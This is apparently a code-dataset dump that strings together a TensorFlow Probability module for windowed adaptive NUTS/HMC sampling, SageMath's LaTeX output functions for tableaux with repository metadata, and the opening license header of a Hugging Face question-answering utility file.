def experimental_with_shard_axes(self, shard_axis_names):
return self.copy(
inner_kernel=self.inner_kernel.experimental_with_shard_axes(
shard_axis_names))
@property
def experimental_shard_axis_names(self):
return self.inner_kernel.experimental_shard_axis_names
def make_windowed_adapt_kernel(*, kind, proposal_kernel_kwargs,
dual_averaging_kwargs, initial_running_variance,
chain_axis_names, shard_axis_names):
"""Constructs a windowed adaptation kernel."""
kernel = WindowedAdaptation(
make_slow_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
initial_running_variance=initial_running_variance),
num_adaptation_steps=dual_averaging_kwargs['num_adaptation_steps'])
if chain_axis_names:
kernel = sharded.Sharded(kernel, chain_axis_names)
if shard_axis_names:
kernel = kernel.experimental_with_shard_axes(shard_axis_names)
return kernel
def _do_sampling(*, kind, proposal_kernel_kwargs, dual_averaging_kwargs,
num_draws, num_burnin_steps, initial_position,
initial_running_variance, trace_fn, bijector,
return_final_kernel_results, seed,
chain_axis_names, shard_axis_names):
"""Sample from base HMC kernel."""
kernel = make_windowed_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
initial_running_variance=initial_running_variance,
chain_axis_names=chain_axis_names,
shard_axis_names=shard_axis_names)
return sample.sample_chain(
num_draws,
initial_position,
kernel=kernel,
num_burnin_steps=num_burnin_steps,
# pylint: disable=g-long-lambda
trace_fn=lambda state, pkr: trace_fn(
state, bijector, pkr.step <= dual_averaging_kwargs[
'num_adaptation_steps'], pkr.inner_results.inner_results.
inner_results),
# pylint: enable=g-long-lambda
return_final_kernel_results=return_final_kernel_results,
seed=seed)
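# Sketch of the heuristic below: a single flattened state part with 16 event
# dimensions gives an initial step size of 0.5 * 16**-0.25 = 0.25.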
def _get_step_size(initial_transformed_position, log_prob_fn):
"""Heuristic for initializing step size.
If we (over) optimistically assume good scaling, 1 / sum(event_dims)**0.25
will be near the optimal step size. We further scale that downwards. See
Langmore, Ian, Michael Dikovsky, Scott Geraedts, Peter Norgaard, and Rob Von
Behren. 2019. “A Condition Number for Hamiltonian Monte Carlo.” arXiv
[stat.CO]. arXiv. http://arxiv.org/abs/1905.09813.
Args:
initial_transformed_position: Iterable of arguments to log_prob_fn, in order
to get a dtype and find a heuristic for an initial step size. We assume
      each Tensor has been flattened so that its event dimensions form the
      last axis.
log_prob_fn: Target log probability function.
Returns:
Scalar float of the same dtype as log_prob_fn.
"""
# TODO(b/187658871): Update this code after internal kernels can support it.
dtype = log_prob_fn(*initial_transformed_position).dtype
return 0.5 * sum([
tf.cast(ps.shape(state_part)[-1], dtype)
for state_part in initial_transformed_position])**-0.25
def _init_momentum(initial_transformed_position, *, batch_shape,
shard_axis_names):
"""Initialize momentum so trace_fn can be concatenated."""
variance_parts = [ps.ones_like(p) for p in initial_transformed_position]
return preconditioning_utils.make_momentum_distribution(
state_parts=initial_transformed_position,
batch_shape=batch_shape,
running_variance_parts=variance_parts,
shard_axis_names=shard_axis_names)
def windowed_adaptive_nuts(n_draws,
joint_dist,
*,
n_chains=64,
num_adaptation_steps=500,
current_state=None,
init_step_size=None,
dual_averaging_kwargs=None,
max_tree_depth=10,
max_energy_diff=500.,
unrolled_leapfrog_steps=1,
parallel_iterations=10,
trace_fn=default_nuts_trace_fn,
return_final_kernel_results=False,
discard_tuning=True,
chain_axis_names=None,
seed=None,
**pins):
"""Adapt and sample from a joint distribution using NUTS, conditioned on pins.
Step size is tuned using a dual-averaging adaptation, and the kernel is
conditioned using a diagonal mass matrix, which is estimated using expanding
windows.
Args:
n_draws: int
Number of draws after adaptation.
joint_dist: `tfd.JointDistribution`
A joint distribution to sample from.
n_chains: int or list of ints
Number of independent chains to run MCMC with.
num_adaptation_steps: int
Number of draws used to adapt step size and mass matrix.
current_state: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample(n_chains)`.
init_step_size: Optional
Where to initialize the step size for the leapfrog integrator. The
structure should broadcast with `current_state`. For example, if the
initial state is
```
{'a': tf.zeros(n_chains),
'b': tf.zeros([n_chains, n_features])}
```
then any of `1.`, `{'a': 1., 'b': 1.}`, or
`{'a': tf.ones(n_chains), 'b': tf.ones([n_chains, n_features])}` will
work. Defaults to the dimension of the log density to the 0.25 power.
dual_averaging_kwargs: Optional dict
Keyword arguments to pass to `tfp.mcmc.DualAveragingStepSizeAdaptation`.
By default, a `target_accept_prob` of 0.85 is set, acceptance
probabilities across chains are reduced using a harmonic mean, and the
class defaults are used otherwise.
max_tree_depth: Maximum depth of the tree implicitly built by NUTS. The
maximum number of leapfrog steps is bounded by `2**max_tree_depth` i.e.
the number of nodes in a binary tree `max_tree_depth` nodes deep. The
default setting of 10 takes up to 1024 leapfrog steps.
    max_energy_diff: Scalar threshold of energy differences at each leapfrog;
      divergence samples are defined as leapfrog steps that exceed this
      threshold. Defaults to 500.
unrolled_leapfrog_steps: The number of leapfrogs to unroll per tree
      expansion step. Applies a direct linear multiplier to the maximum
      trajectory length implied by max_tree_depth. Defaults to 1.
parallel_iterations: The number of iterations allowed to run in parallel.
It must be a positive integer. See `tf.while_loop` for more details.
trace_fn: Optional callable
The trace function should accept the arguments
`(state, bijector, is_adapting, phmc_kernel_results)`, where the `state`
is an unconstrained, flattened float tensor, `bijector` is the
`tfb.Bijector` that is used for unconstraining and flattening,
`is_adapting` is a boolean to mark whether the draw is from an adaptation
step, and `phmc_kernel_results` is the
`UncalibratedPreconditionedHamiltonianMonteCarloKernelResults` from the
`PreconditionedHamiltonianMonteCarlo` kernel. Note that
`bijector.inverse(state)` will provide access to the current draw in the
untransformed space, using the structure of the provided `joint_dist`.
return_final_kernel_results: If `True`, then the final kernel results are
returned alongside the chain state and the trace specified by the
`trace_fn`.
discard_tuning: bool
Whether to return tuning traces and draws.
chain_axis_names: A `str` or list of `str`s indicating the named axes
by which multiple chains are sharded. See `tfp.experimental.mcmc.Sharded`
for more context.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
These are used to condition the provided joint distribution, and are
passed directly to `joint_dist.experimental_pin(**pins)`.
Returns:
A single structure of draws is returned in case the trace_fn is `None`, and
`return_final_kernel_results` is `False`. If there is a trace function,
the return value is a tuple, with the trace second. If the
`return_final_kernel_results` is `True`, the return value is a tuple of
length 3, with final kernel results returned last. If `discard_tuning` is
`True`, the tensors in `draws` and `trace` will have length `n_draws`,
otherwise, they will have length `n_draws + num_adaptation_steps`.
"""
if dual_averaging_kwargs is None:
dual_averaging_kwargs = {}
dual_averaging_kwargs = dict(dual_averaging_kwargs)
dual_averaging_kwargs.setdefault('target_accept_prob', 0.85)
proposal_kernel_kwargs = {
'step_size': init_step_size,
'max_tree_depth': max_tree_depth,
'max_energy_diff': max_energy_diff,
'unrolled_leapfrog_steps': unrolled_leapfrog_steps,
'parallel_iterations': parallel_iterations}
return _windowed_adaptive_impl(
n_draws=n_draws,
joint_dist=joint_dist,
kind='nuts',
n_chains=n_chains,
proposal_kernel_kwargs=proposal_kernel_kwargs,
current_state=current_state,
num_adaptation_steps=num_adaptation_steps,
dual_averaging_kwargs=dual_averaging_kwargs,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
discard_tuning=discard_tuning,
chain_axis_names=chain_axis_names,
seed=seed,
**pins)
def windowed_adaptive_hmc(n_draws,
joint_dist,
*,
num_leapfrog_steps,
n_chains=64,
num_adaptation_steps=500,
current_state=None,
init_step_size=None,
dual_averaging_kwargs=None,
trace_fn=default_hmc_trace_fn,
return_final_kernel_results=False,
discard_tuning=True,
chain_axis_names=None,
seed=None,
**pins):
"""Adapt and sample from a joint distribution, conditioned on pins.
This uses Hamiltonian Monte Carlo to do the sampling. Step size is tuned using
a dual-averaging adaptation, and the kernel is conditioned using a diagonal
mass matrix, which is estimated using expanding windows.
Args:
n_draws: int
Number of draws after adaptation.
joint_dist: `tfd.JointDistribution`
A joint distribution to sample from.
num_leapfrog_steps: int
Number of leapfrog steps to use for the Hamiltonian Monte Carlo step.
n_chains: int or list of ints
Number of independent chains to run MCMC with.
num_adaptation_steps: int
Number of draws used to adapt step size and mass matrix.
current_state: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample(n_chains)`.
init_step_size: Optional
Where to initialize the step size for the leapfrog integrator. The
structure should broadcast with `current_state`. For example, if the
initial state is
```
{'a': tf.zeros(n_chains),
'b': tf.zeros([n_chains, n_features])}
```
then any of `1.`, `{'a': 1., 'b': 1.}`, or
`{'a': tf.ones(n_chains), 'b': tf.ones([n_chains, n_features])}` will
work. Defaults to the dimension of the log density to the 0.25 power.
dual_averaging_kwargs: Optional dict
Keyword arguments to pass to `tfp.mcmc.DualAveragingStepSizeAdaptation`.
By default, a `target_accept_prob` of 0.75 is set, acceptance
probabilities across chains are reduced using a harmonic mean, and the
class defaults are used otherwise.
trace_fn: Optional callable
The trace function should accept the arguments
`(state, bijector, is_adapting, phmc_kernel_results)`, where the `state`
is an unconstrained, flattened float tensor, `bijector` is the
`tfb.Bijector` that is used for unconstraining and flattening,
`is_adapting` is a boolean to mark whether the draw is from an adaptation
step, and `phmc_kernel_results` is the
`UncalibratedPreconditionedHamiltonianMonteCarloKernelResults` from the
`PreconditionedHamiltonianMonteCarlo` kernel. Note that
`bijector.inverse(state)` will provide access to the current draw in the
untransformed space, using the structure of the provided `joint_dist`.
return_final_kernel_results: If `True`, then the final kernel results are
returned alongside the chain state and the trace specified by the
`trace_fn`.
discard_tuning: bool
Whether to return tuning traces and draws.
chain_axis_names: A `str` or list of `str`s indicating the named axes
by which multiple chains are sharded. See `tfp.experimental.mcmc.Sharded`
for more context.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
These are used to condition the provided joint distribution, and are
passed directly to `joint_dist.experimental_pin(**pins)`.
Returns:
A single structure of draws is returned in case the trace_fn is `None`, and
`return_final_kernel_results` is `False`. If there is a trace function,
the return value is a tuple, with the trace second. If the
`return_final_kernel_results` is `True`, the return value is a tuple of
length 3, with final kernel results returned last. If `discard_tuning` is
`True`, the tensors in `draws` and `trace` will have length `n_draws`,
otherwise, they will have length `n_draws + num_adaptation_steps`.
"""
if dual_averaging_kwargs is None:
dual_averaging_kwargs = {}
dual_averaging_kwargs = dict(dual_averaging_kwargs)
dual_averaging_kwargs.setdefault('target_accept_prob', 0.75)
proposal_kernel_kwargs = {
'num_leapfrog_steps': num_leapfrog_steps,
'step_size': init_step_size,
'store_parameters_in_results': True}
return _windowed_adaptive_impl(
n_draws=n_draws,
joint_dist=joint_dist,
kind='hmc',
n_chains=n_chains,
proposal_kernel_kwargs=proposal_kernel_kwargs,
num_adaptation_steps=num_adaptation_steps,
current_state=current_state,
dual_averaging_kwargs=dual_averaging_kwargs,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
discard_tuning=discard_tuning,
seed=seed,
chain_axis_names=chain_axis_names,
**pins)
def _windowed_adaptive_impl(n_draws,
joint_dist,
*,
kind,
n_chains,
proposal_kernel_kwargs,
num_adaptation_steps,
current_state,
dual_averaging_kwargs,
trace_fn,
return_final_kernel_results,
discard_tuning,
seed,
chain_axis_names,
**pins):
"""Runs windowed sampling using either HMC or NUTS as internal sampler."""
if trace_fn is None:
trace_fn = lambda *args: ()
no_trace = True
else:
no_trace = False
if isinstance(n_chains, int):
n_chains = [n_chains]
if (tf.executing_eagerly() or
not control_flow_util.GraphOrParentsInXlaContext(
tf1.get_default_graph())):
# A Tensor num_draws argument breaks XLA, which requires static TensorArray
# trace_fn result allocation sizes.
num_adaptation_steps = ps.convert_to_shape_tensor(num_adaptation_steps)
if 'num_adaptation_steps' in dual_averaging_kwargs:
warnings.warn('Dual averaging adaptation will use the value specified in'
' the `num_adaptation_steps` argument for its construction,'
' hence there is no need to specify it in the'
' `dual_averaging_kwargs` argument.')
# TODO(b/180011931): if num_adaptation_steps is small, this throws an error.
dual_averaging_kwargs['num_adaptation_steps'] = num_adaptation_steps
dual_averaging_kwargs.setdefault('reduce_fn',
generic_math.reduce_log_harmonic_mean_exp)
# By default, reduce over named axes for step size adaptation
dual_averaging_kwargs.setdefault('experimental_reduce_chain_axis_names',
chain_axis_names)
setup_seed, sample_seed = samplers.split_seed(
samplers.sanitize_seed(seed), n=2)
(target_log_prob_fn, initial_transformed_position, bijector,
step_broadcast, batch_shape, shard_axis_names) = _setup_mcmc(
joint_dist,
n_chains=n_chains,
init_position=current_state,
seed=setup_seed,
**pins)
if proposal_kernel_kwargs.get('step_size') is None:
if batch_shape.shape != (0,): # Scalar batch has a 0-vector shape.
raise ValueError('Batch target density must specify init_step_size. Got '
f'batch shape {batch_shape} from joint {joint_dist}.')
init_step_size = _get_step_size(initial_transformed_position,
target_log_prob_fn)
else:
init_step_size = step_broadcast(proposal_kernel_kwargs['step_size'])
proposal_kernel_kwargs.update({
'target_log_prob_fn': target_log_prob_fn,
'step_size': init_step_size,
'momentum_distribution': _init_momentum(
initial_transformed_position,
batch_shape=ps.concat([n_chains, batch_shape], axis=0),
shard_axis_names=shard_axis_names)})
initial_running_variance = [
sample_stats.RunningVariance.from_stats( # pylint: disable=g-complex-comprehension
num_samples=tf.zeros([], part.dtype),
mean=tf.zeros_like(part),
variance=tf.ones_like(part)) for part in initial_transformed_position
]
# TODO(phandu): Consider splitting out warmup and post warmup phases
# to avoid executing adaptation code during the post warmup phase.
ret = _do_sampling(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
num_draws=n_draws if discard_tuning else n_draws + num_adaptation_steps,
num_burnin_steps=num_adaptation_steps if discard_tuning else 0,
initial_position=initial_transformed_position,
initial_running_variance=initial_running_variance,
bijector=bijector,
trace_fn=trace_fn,
return_final_kernel_results=return_final_kernel_results,
chain_axis_names=chain_axis_names,
shard_axis_names=shard_axis_names,
seed=sample_seed)
if return_final_kernel_results:
draws, trace, fkr = ret
return sample.CheckpointableStatesAndTrace(
all_states=bijector.inverse(draws),
trace=trace,
final_kernel_results=fkr)
else:
draws, trace = ret
if no_trace:
return bijector.inverse(draws)
else:
return sample.StatesAndTrace(
all_states=bijector.inverse(draws), trace=trace)
| 42.45301
| 119
| 0.708479
|
505a3c1be35ff1ab9a1585eb9bb0cde57a5e0a30
| 12,464
|
py
|
Python
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 3
|
2019-07-15T13:48:24.000Z
|
2019-11-08T12:31:43.000Z
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 2
|
2018-10-30T13:40:20.000Z
|
2020-07-23T12:13:30.000Z
|
src/sage/combinat/output.py
|
bopopescu/sage
|
2d495be78e0bdc7a0a635454290b27bb4f5f70f0
|
[
"BSL-1.0"
] | 1
|
2019-06-02T03:16:55.000Z
|
2019-06-02T03:16:55.000Z
|
"""
Output functions
These are the output functions for latexing partitions and tableaux.
AUTHORS:
- Mike Hansen (?): initial version
- Andrew Mathas (2013-02-14): Added support for displaying conventions and
lines, and tableaux of skew partition, composition, and
skew/composition/partition/tableaux tuple shape.
"""
from __future__ import absolute_import, print_function
from six.moves import range
from string import Template
from sage.combinat.tableau import Tableaux
# The tex macro used to latex individual cells in an array (as a template).
# When the template is used, ``bar`` should be replaced by '|' or ''.
lr_macro = Template(r'\def\lr#1{\multicolumn{1}{$bar@{\hspace{.6ex}}c@{\hspace{.6ex}}$bar}{\raisebox{-.3ex}{$$#1$$}}}')
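# For illustration (matching the doctest output below): lr_macro.substitute(bar='|') expands to
#   \def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
# i.e. the form used when lines are drawn, while lr_macro.substitute(bar='') drops the vertical rules.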
def tex_from_array(array, with_lines=True):
r"""
Return a latex string for a two dimensional array of partition, composition or skew composition shape
INPUT:
- ``array`` -- a list of list
- ``with_lines`` -- a boolean (default: ``True``)
Whether to draw a line to separate the entries in the array.
Empty rows are allowed; however, such rows should be given as
``[None]`` rather than ``[]``.
The array is drawn using either the English or French convention
following :meth:`Tableaux.options`.
.. SEEALSO:: :meth:`tex_from_array_tuple`
EXAMPLES::
sage: from sage.combinat.output import tex_from_array
sage: print(tex_from_array([[1,2,3],[4,5]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\lr{4}&\lr{5}\\\cline{1-2}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}\\
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-4}
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{8}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\
\lr{8}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{3-3}
&&\lr{3}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{8}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{3-3}
&&\lr{3}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&\lr{8}\\\cline{2-2}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&&\lr{3}\\
&\lr{5}&\lr{6}&\lr{7}\\
\lr{8}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&&\lr{3}\\
&\lr{5}&\lr{6}&\lr{7}\\
&\lr{8}\\
\end{array}$}
}
sage: Tableaux.options.convention="french"
sage: print(tex_from_array([[1,2,3],[4,5]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-2}
\lr{4}&\lr{5}\\\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{4}&\lr{5}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-1}
\lr{8}\\\cline{1-4}
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\\cline{1-4}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$}
}
sage: print(tex_from_array([[1,2,3],[4,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
\lr{8}\\
\lr{4}&\lr{5}&\lr{6}&\lr{7}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-1}
\lr{8}\\\cline{1-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&&\lr{3}\\\cline{3-3}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{2-2}
&\lr{8}\\\cline{2-4}
&\lr{5}&\lr{6}&\lr{7}\\\cline{2-4}
&&\lr{3}\\\cline{3-3}
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
\lr{8}\\
&\lr{5}&\lr{6}&\lr{7}\\
&&\lr{3}\\
\end{array}$}
}
sage: print(tex_from_array([[None,None,3],[None,5,6,7],[None,8]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\\
&\lr{8}\\
&\lr{5}&\lr{6}&\lr{7}\\
&&\lr{3}\\
\end{array}$}
}
sage: Tableaux.options._reset()
"""
lr=lr_macro.substitute(bar='|' if with_lines else '')
if Tableaux.options.convention == "English":
return '{%s\n%s\n}' % (lr, tex_from_skew_array(array, with_lines))
else:
return '{%s\n%s\n}' % (lr, tex_from_skew_array(array[::-1], with_lines, align='t'))
def tex_from_array_tuple(a_tuple, with_lines=True):
r"""
Return a latex string for a tuple of two dimensional array of partition,
composition or skew composition shape.
INPUT:
- ``a_tuple`` -- a tuple of lists of lists
- ``with_lines`` -- a boolean (default: ``True``)
Whether to draw lines to separate the entries in the components of ``a_tuple``.
.. SEEALSO:: :meth:`tex_from_array` for the description of each array
EXAMPLES::
sage: from sage.combinat.output import tex_from_array_tuple
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\lr{4}&\lr{5}\\\cline{1-2}
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\cline{2-3}
&\lr{6}&\lr{7}\\\cline{2-3}
&\lr{8}\\\cline{1-2}
\lr{9}\\\cline{1-1}
\end{array}$}
}
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
\lr{1}&\lr{2}&\lr{3}\\
\lr{4}&\lr{5}\\
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[b]{*{3}c}\\
&\lr{6}&\lr{7}\\
&\lr{8}\\
\lr{9}\\
\end{array}$}
}
sage: Tableaux.options.convention="french"
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]]))
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-2}
\lr{4}&\lr{5}\\\cline{1-3}
\lr{1}&\lr{2}&\lr{3}\\\cline{1-3}
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\cline{1-1}
\lr{9}\\\cline{1-2}
&\lr{8}\\\cline{2-3}
&\lr{6}&\lr{7}\\\cline{2-3}
\end{array}$}
}
sage: print(tex_from_array_tuple([[[1,2,3],[4,5]],[],[[None,6,7],[None,8],[9]]], with_lines=False))
{\def\lr#1{\multicolumn{1}{@{\hspace{.6ex}}c@{\hspace{.6ex}}}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{4}&\lr{5}\\
\lr{1}&\lr{2}&\lr{3}\\
\end{array}$},\emptyset,\raisebox{-.6ex}{$\begin{array}[t]{*{3}c}\\
\lr{9}\\
&\lr{8}\\
&\lr{6}&\lr{7}\\
\end{array}$}
}
"""
lr=lr_macro.substitute(bar='|' if with_lines else '')
if Tableaux.options.convention == "English":
return '{%s\n%s\n}' % (lr, ','.join(
r'\emptyset' if comp==[] else tex_from_skew_array(comp, with_lines) for comp in a_tuple))
else:
return '{%s\n%s\n}' % (lr, ','.join(
r'\emptyset' if comp==[] else tex_from_skew_array(comp[::-1], with_lines, align='t') for comp in a_tuple))
def tex_from_skew_array(array, with_lines=False, align='b'):
r"""
This function creates latex code for a "skew composition" ``array``.
That is, for a two dimensional array in which each row can begin with
    an arbitrary number of ``None``'s and the remaining entries could, in
    principle, be anything but probably should be strings or integers of similar
width. A row consisting completely of ``None``'s is allowed.
INPUT:
- ``array`` -- The array
- ``with_lines`` -- (Default: ``False``) If ``True`` lines are drawn, if
``False`` they are not
- ``align`` -- (Default: ``'b'``) Determines the alignment on the latex
array environments
EXAMPLES::
sage: array=[[None, 2,3,4],[None,None],[5,6,7,8]]
sage: print(sage.combinat.output.tex_from_skew_array(array))
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\\
&\lr{2}&\lr{3}&\lr{4}\\
&\\
\lr{5}&\lr{6}&\lr{7}&\lr{8}\\
\end{array}$}
"""
# first identify where the None's appear in ``array`` and define a
# function end_line which puts in the required \cline's.
if with_lines:
# last position of None in each row
nones=[1 if not None in row else 1+len(row)-row[::-1].index(None) for row in array]
def end_line(r):
# in a slightly unpythonic way, we label the lines as 0, 1, ..., len(array)
if r==0:
return r'\cline{%s-%s}'%(nones[0],len(array[0]))
elif r==len(array):
start=nones[r-1]
finish=len(array[r-1])
else:
start=min(nones[r], nones[r-1])
finish=max(len(array[r]), len(array[r-1]))
return r'\\' if start>finish else r'\\\cline{%s-%s}'%(start, finish)
else:
end_line=lambda r: r'\\'
# now we draw the array
tex=r'\raisebox{-.6ex}{$\begin{array}[%s]{*{%s}c}'%(align,max(map(len,array)))
tex+=end_line(0)+'\n'
for r in range(len(array)):
tex+='&'.join('' if c is None else r'\lr{%s}'%c for c in array[r])
tex+=end_line(r+1)+'\n'
return tex+r'\end{array}$}'
| 40.732026
| 119
| 0.518935
|
36d911b9e9acfb4d7670c457a12df0aa69c636dd
| 22,159
|
py
|
Python
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 101
|
2021-12-22T00:03:51.000Z
|
2022-03-30T07:39:09.000Z
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 5
|
2021-12-30T07:01:11.000Z
|
2022-03-28T01:56:04.000Z
|
examples/tensorflow/question-answering/utils_qa.py
|
MichalPitr/transformers
|
8b26688e2e4b68a64f4710b3627439089947cb08
|
[
"Apache-2.0"
] | 11
|
2021-12-30T06:18:04.000Z
|
2022-03-28T13:50:00.000Z
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
